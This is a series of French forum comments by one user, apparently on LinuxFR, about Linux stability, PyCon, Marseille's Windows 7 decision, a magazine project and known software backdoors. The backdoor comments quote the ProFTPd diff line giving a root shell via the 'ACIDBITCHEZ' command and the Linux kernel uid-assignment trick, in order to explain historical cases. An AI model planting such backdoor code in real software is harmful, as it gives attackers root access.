Victor STINNER a écrit 1632 commentaires

... quand le pilote du contrôleur USB se vautre lamentablement

Ca doit faire 6 ans que j'utilise Linux et je n'ai jamais eu de plantage lié à USB (pourtant j'ai branché plusieurs disques, souris, claviers, iPod, iPhone et autres gadgets).

j'apprécie que quand le traducteur ext2fs se vautre ...

J'ai déjà entendu parler de plantages ext2 ou ext3, mais après une très longue période (plusieurs mois). Je crois qu'une fois (je m'en souviens très mal), j'ai eu un plantage ext3, mais j'étais en train de bidouiller, voir chercher à faire planter ext3.

Bref : avoir un OS qui résiste aux plantages, c'est rigolo, mais en pratique (avec Linux), ça semble un peu inutile (pour les pilotes les plus courants dumoins).

Bah Attila Kinali écrit "First i want to give you a warm FUCK YOU ALL! for what you've written and done the last few days." C'est clair non ? :-)

FreeBSD et OpenBSD sont développés avec CVS. D'ailleurs, CVS est aussi nécessaire sur le poste client pour utiliser les ports FreeBSD non ?
http://wiki.freebsd.org/VersionControl

Tiens, il semble d'ailleurs que l'OS plus libre que libre (FreeBSD) utilise d'ailleurs un logiciel proprio en plus pour gérer son code : Perforce.

En même temps (9 au 17 mars), il y a Pycon US à Atlanta (Géorgie). C'est le plus gros événement autour du langage Python. La liste des conférences acceptées est en ligne, mais pas encore le programme :
http://us.pycon.org/2011/schedule/lists/talks/

Pycon US, c'est 2 jours de tutoriels (payants), 3 jours de conférences et 4 jours de sprints (journées où des développeurs travaillent ensemble sur un projet donné, il y a plusieurs sprints en parallèle). L'entrée est payante (entre 200 et 750$ selon le moment où vous achetez le billet et selon que vous soyez étudiant, particulier ou professionnel).

Les diaporamas et vidéos de l'année 2010 sont disponible en ligne :
http://us.pycon.org/2010/conference/

Ahem. Pour cela il faudrait que les pilotes de toutes les cartes graphiques fonctionnent à merveille sous Linux, y compris dans les anciennes distributions Linux. À moins que la version qui va suivre Firefox 4.0 ne souhaite pas supporter les distributions Linux ayant plus de 6 mois ?

Je me souviens de mon expérience avec OpenGL il y a quelques années : on avait passé le moteur du jeu Wormux de SDL à OpenGL (lors du passage de ClanLib 0.6 à 0.8 si je me souviens bien). Plusieurs joueurs sont passés de 30 à 50 images par seconde à moins d'une image par seconde : jeu injouable. (Par contre, certains joueurs ayant la bonne carte graphique avec le bon pilote -genre Nvidia et le pilote proprio- avaient un jeu plus rapide.)

Les développeurs de ClanLib voulaient simplifier leur code en imposant OpenGL... sauf que les pilotes OpenGL sous Linux, c'était pas ça. J'avais tenté de réintégrer le support de SDL dans ClanLib, mais c'était assez complexe, je n'avais pas eu le temps de finir et les développeurs ClanLib ne m'ont pas vraiment soutenu.

Finalement, on a pris la sage décision de migrer directement à SDL, et depuis tout va bien côté rendu graphique :-) Il me semble d'ailleurs que SDL peut utiliser OpenGL en interne (si on active une certaine option ?).

http://pyroom.org/ est libre par contre.

http://inetcore.com/project/ipv4ec/index_fr.html

Relire aussi la dernière dépêche à ce sujet : http://linuxfr.org/2010/10/29/27523.html

J'aime bien le nom du document : « Migration 7 VDM.pdf » :-)

Tout d'abord, merci à l'agent du département des Bouches du Rhône qui a mis en ligne ces documents ! Ca permet de comprendre un peu mieux les revirements de situations dans les projets de migration à Linux.

Extraits des raisons du choix de Windows Seven plutôt que Linux sur les postes de travail de la mairie de Marseille :

« la faible part de marché détenue actuellement par Linux considérée comme un risque quant à sa pérennité »

Il me semble que Linux existe depuis 1991, il existe donc depuis environ 20 ans, et vu ses parts de marché sur les serveurs (et des supercalculateurs), je doute très fortement qu'il ait un risque quant à sa pérénnité. De plus, Linux est de plus en plus présent dans l'embarqué (Android par exemple). Linux est également utilisé par de grandes entreprises comme Google.

« l'inconvénient d'amener avec Linux un changement d'usage fort pour la majorité de nos utilisateurs alors que nous les sollicitons et les solliciterons pour bien d'autres changements prévus (exemple : éradication des postes Mac, utilisation de Open Office, changement d'outil GroupWare, la politique d'impression, ...) »

Passer de Mac OS X (Apple) à Windows, ça me semble être kif-kif avec le passage de Mac OS X à Linux. En même temps, je suppose que le GroupWare est en ligne (web), donc pas de changement, et OpenOffice est identique sous Windows et Linux. Je ne trouve pas cette justification recevable. En plus, la migration peut être douce avec comme première étape, le passage à Thunderbird pour la messagerie électronique. La migration vers des postes de travail Linux est une chose de plus en plus courante, y compris à grande échelle, ça ne doit pas être dur de trouver des informations et des prestataires pour réaliser ce genre de mission.

« notre stock d'applications métiers n'utilisant pas les technologies Web indispensables à un portage sous Linux et l'analyse nous portant à penser que les éditeurs fourniront en premier lieu leur version compatible pour Seven avant de proposer celle pour Linux »

Je pense qu'une administration a les sous pour commander une version Linux. Ou mieux (plus pérenne), acheter du service à une SSLL pour migrer à une solution libre compatible avec Linux (voir Windows, Linux et Mac).

« Les atouts de Linux tels que l'économie sur les licences et l'autonomie technique ont bien été considérées mais ne suffisent pas pour contrebalancer l'avantage donné à Seven dans les conclusions de notre étude. »

Je me demande s'ils ont du changer des anciens ordinateurs qui n'étaient pas assez puissants pour « bénéficier » de Windows Seven.

Est-ce si difficile de trouver un administrateur système pour gérer un parc de machines sous Linux à Marseille ?

L'article Wikipédia est correct (et sourcé !), c'est bien ProFTPd. Punaise, je n'arrête pas de les confondre !

Oups oui, c'est ProFTPd pardon.

Il y a eu au moins deux tentatives d'introduction d'une porte dérobée dans un logiciel libre, dans PostgreSQL (en 2010) et dans le noyau Linux (2003). Dans les deux cas, la faille introduit était flagrante. D'ailleurs, pour PostgreSQL, l'archive verrolée est restée en ligne 5 jours, et la faille dans le noyau Linux a été vue et corrigée en un jour à peine.

Après il existe aussi les portes dérobées involontaires, comme la fameuse histoire de Debian+OpenSSL, ou encore l'installeur Ubuntu qui stockait le mot de passe root en clair sans un fichier lisible par n'importe qui.

J'ai complété l'article Wikipédia en documentant 7 affaires de portes dérobées :
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e

Une attaque similaire à été menée contre PostgreSQL : l'archive contenant la dernière version a été modifiée pour introduire une commande (HELP ACIDBITCHEZ) donnant un accès shell. L'archive verrolée a été poussée sur le serveur FTP principal, puis les miroirs ont recopiés cette archive.
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#ProFTPd(...)

Une personne possédant les archives verrolées et non verrolées peut se rendre compte de la modification en cherchant les différences :
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

Il existe une affaire de clé de chiffrement asymétrique dont une clé publique appellée « _NSAKEY » s'est retrouvée dans Windows NT4 : http://fr.wikipedia.org/wiki/NSAKEY

Je suppose que pasBill pasGates fait référence à ça.

Ce n'est pas « if (current->uid = 0) » qui a été introduit, cette syntaxe produisant un avertissement avec les compilateurs C pas trop bêtes. C'est « if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) » qui ne produit pas d'avertissement car l'assignation est entourée par des parenthèses.

Il arrive tellement souvent qu'on se trompe (écrire a=b au lieu de a==b dans un if), que les compilateurs devraient générer une erreur. Sauf que beaucoup de programmes utilisent une assignation dans un if pour économiser une ligne ... Je trouve ça malsain d'économiser une ligne, ça rend le code plus difficile à relire et donc à maintenir.

La grammaire de Python interdit une assignation dans un test : « if a=b: ... » génère une SyntaxError.

La source primaire est un email sur la liste Bugtraq. Cet email parle de « HP MSA2000 G3 », mais le nom complet est « HP StorageWorks P2000 G3 MSA Array Systems ». Selon SecurityWeek, seul un modèle (P2000 G3) est impacté et non pas l'ensemble de la gamme (MSA). P2000 G3 fait parti de la gamme MSA.

J'ai mis à jour l'article Wikipédia pour indiquer le modèle exact : http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#HP_Stor(...)

Euh... Cette affaire fait beaucoup de bruit et finalement, il y a peu de choses intéressantes qui en ressortent pour le moment. Une dépêche sur le sujet a été proposée et refusée sur LinuxFR. Avant d'en parler, il faudrait en savoir un peu plus.

Mise à jour de l'article SecurityWeek :

« Update 11:23AM EST 12/15/2010 - SecurityWeek has received a statement from HP on the issue: "HP identified a potential security issue with the HP StorageWorks P2000 G3 only. This does not impact HP’s MSA line of storage solutions. HP has identified an immediate fix for this issue and is rapidly informing customers of the solution." »

http://www.securityweek.com/backdoor-vulnerability-discovere(...)

T'es sûr qu'on peut le modifier ? Pourquoi HP considère ça comme une faille de sécurité et va proposer un correctif dans ce cas ?

C'est Michael Shalayeff (mickey) qui a introduit la faille (volontairement ? ou pas ?) :
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/rnd.c
Revision 1.36: Thu Apr 13 13:48:29 2000 UTC (10 years, 8 months ago) by mickey

En 2000, son adresse mail était mickey@akula.com et sa signature était « paranoic mickey (my employers have changed but, the name has remained) ».

Euh, plutôt que de spéculer sur une affaire récente dont on ne connait pas encore les détails, regardons plutôt les affaires connues :
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#Affaire(...)
(je viens de modifier l'article pour ajouter HP MSA2000 et Cisco Unified Videoconferencing et ajouter des détails sur la tentative de backdoor Linux)

On voit par exemple qu'une backdoor a existé dans le logiciel propriétaire Interbase durant 7 ans, et la backdoor a été trouvée lors de l'ouverture du code source par son éditeur.

Au contraire, il y a eu la backdoir introduite dans le noyau Linux a été détectée en un jour à peine ! Pourtant la faille est très difficile à remarquer, même pour un programmeur C entrainé. Si j'ai bien compris, ce n'est pas les 2 lignes ajoutées à kernel/exit.c qui ont mis la puce à l'oreille, mais une incohérence entre le dépôt officiel (BitKeeper) et le miroir CVS. La faille a été introduite sur le serveur CVS en se faisant passer par David S. Miller (davem) et non pas dans le dépôt officiel (qui offrait une meilleur sécurité).

Ahem, ça contredit complètement que tu racontes pasBill pasGates.

Oh bah tiens, CHM est aussi une sortie possible de Sphinx :-) http://sphinx.pocoo.org/latest/builders.html

il faut éventuellement penser à des traductions, au moins vers l'anglais. Et plus tard, l'inverse.

Perso je ne compte pas faire ce travail de traduction. Maintenant, si des volontaires le faire, ça sera avec plaisir que je compilerai ça en un magazine.

peu de pages, mais souvent. Plutôt qu'un gros pavé de temps en temps.

Mouais. Je préfère un pavé à lire à tête reposée, avec un choix des articles, plutôt qu'un empilement d'articles hétérogènes. Il existe déjà des sites qui publient des articles au fur et à mesure.

Bah, parce que je ne veux pas écrire, mais lire des articles :-) Et je ne suis pas satisfait des articles dans LinuxMag : trop peu d'articles m'intéressent pour que je paie 6,50€. Par contre, c'est avec plaisir que j'ai payé 60€ pour m'abonner à LWN (pendant un an, en fait je me suis réabonné) :-)

as-tu les capacités (en temps surtout) de t'y investir autant qu'un Johnatan Corbet pour LWN ?

Je pense qu'il existe suffisamment d'auteurs que ça titile d'écrire dans la nature. Je ne souhaite pas écrire moi même.

Pour l'instant, je ne sais pas trop dans quel sens part le projet. Je pense que c'est plus simple que le premier numéro soit libre et gratuit.

Au sujet de l'abonnement : l'argent permet certaines choses intéressantes comme payer les auteurs, avoir une version papier, faire de la pub, payer une personne pour faire la PAO, etc. Je donne l'exemple de LWN car je trouve que c'est un bon compromis : les articles sont librement accessibles après un certain temps (2 semaines si je ne trompe pas, ce que je trouve très court d'ailleurs). Mais LWN est différent car ils publient en continu (alors que je vise plutôt un périodique). LinuxMag propose aussi de payer les auteurs mais que les articles soient quand même libres 3 mois après la publication papier. Mais pour le moment, c'est hors de question de faire une version payante. Enfin, comme c'est libre, quelqu'un d'autre pourrait proposer une version payante s'il le veut bien sûr (alors qu'il existerait la même chose gratos à côté, mais bon).

Bon, stop, j'avoue tout ! Mon but est de gagner un max de pognon sur le dos de ces crétins de libristes écervelés incapable de voir l'énorme manne financière derrière ce projet !